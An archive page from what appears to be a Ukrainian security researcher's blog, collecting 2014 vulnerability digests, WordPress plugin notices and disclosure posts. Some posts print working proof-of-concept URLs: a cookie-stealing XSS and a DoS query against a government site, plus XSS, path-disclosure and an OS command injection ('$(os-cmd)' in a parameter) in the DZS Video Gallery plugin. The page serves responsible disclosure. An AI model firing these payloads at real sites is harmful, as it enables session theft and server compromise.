Архів для категорії 'Уразливості'

Добірка уразливостей

17:23 19.08.2014

В даній добірці уразливості в веб додатках:

  • Multiple XSS vulnerabilities in Roundcube (деталі)
  • Multiple Vulnerabilities in OpenDocMan (деталі)
  • Cross-Site Scripting (XSS) in Open Classifieds (деталі)
  • Cross-Site Scripting (XSS) in CMSimple (деталі)
  • Microsoft Security Bulletin MS13-066 - Important Vulnerability in Active Directory Federation Services Could Allow Information Disclosure (2873872) (деталі)

Добірка уразливостей

17:20 31.07.2014

В даній добірці уразливості в веб додатках:

  • RSA BSAFE SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability (деталі)
  • Remote code execution in Apache Syncope (деталі)
  • SQL Injection in AdRotate (деталі)
  • Cross-Site Scripting (XSS) in Ilch CMS (деталі)
  • RSA Archer GRC Multiple Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №149

23:51 30.07.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Photocrati, Stop User Enumeration та Dandelion. Для котрих з’явилися експлоіти. Photocrati - це тема движка, Stop User Enumeration - це секюріті плагін (для захисту від підбору логінів), Dandelion - це тема движка.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:24 29.07.2014

В даній добірці уразливості в веб додатках:

  • RSA BSAFE SSL-J Multiple Vulnerabilities (деталі)
  • horde3 security update (деталі)
  • SQL Injection in doorGets CMS (деталі)
  • Multiple SQL Injection Vulnerabilities in AuraCMS (деталі)
  • RSA BSAFE Micro Edition Suite Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability (деталі)

Уразливості на www.gp.gov.ua

17:27 25.07.2014

25.03.2014

У січні, 30.01.2014, я знайшов Denial of Service та Cross-Site Scripting уразливості на сайті Генеральної прокуратури України - http://www.gp.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на dsmsu.gov.ua та president.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

25.07.2014

DoS:

http://www.gp.gov.ua/ua/search.html?q=%25%25%25

XSS:

http://www.gp.gov.ua/ua/search.html?q=1&sort=%22%3E%3Cbody%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені. Адмінам державних сайтів лише потрібно не забувати дякувати за повідомлення про уразливості на їхніх сайтах.

Уразливості в Dahua IP Camera

23:56 24.07.2014

У липні, 13.07.2014, я знайшов уразливості в Dahua IP Camera (веб камера). Зокрема Brute Force та Abuse of Functionality уразливості.

Раніше я писав про уразливості у веб камерах, зокрема в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Добірка уразливостей

17:28 24.07.2014

В даній добірці уразливості в веб додатках:

  • HP Smart Zero Client, Unauthorized Access (деталі)
  • gpEasy v4.3.x CMS - Multiple Web Vulnerabilities (деталі)
  • WHMCS Denial of Service Vulnerability (деталі)
  • MantisBT input sanitization errors (деталі)
  • Microsoft Security Bulletin MS13-061 - Critical Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2876063) (деталі)

Уразливості в плагінах для WordPress №148

23:52 23.07.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах SS Downloads, Infocus та Amerisale-Re. Для котрих з’явилися експлоіти. SS Downloads - це плагін для підрахунку скачувань, Infocus - це тема движка, Amerisale-Re - це e-commerce плагін.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 22.07.2014

В даній добірці уразливості в веб додатках:

  • Aastra IP Telephone hardcoded telnet admin password (деталі)
  • Multiple reflected XSS vulnerabilities in Atmail WebMail (деталі)
  • Remote Code Execution in Projoom NovaSFH Plugin (деталі)
  • AlienVault OSSIM SQL Injection vulnerability (деталі)
  • Low severity flaw in RIM BlackBerry PlayBook OS browser (деталі)

XSS, FPD і RCE уразливості в DZS Video Gallery для WordPress

23:54 12.07.2014

08.05.2014

У квітні, 24.04.2014, я виявив Cross-Site Scripting, Full path disclosure та OS Commanding уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Js-Multi-Hotel для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2014

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

Уразливості в php-скриптах або в error_log у всіх папках плагіна. Різні файли в різних версіях плагіна.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE використовуючи метод Pichaya Morimoto.

Вразливі все версії DZS Video Gallery для WordPress.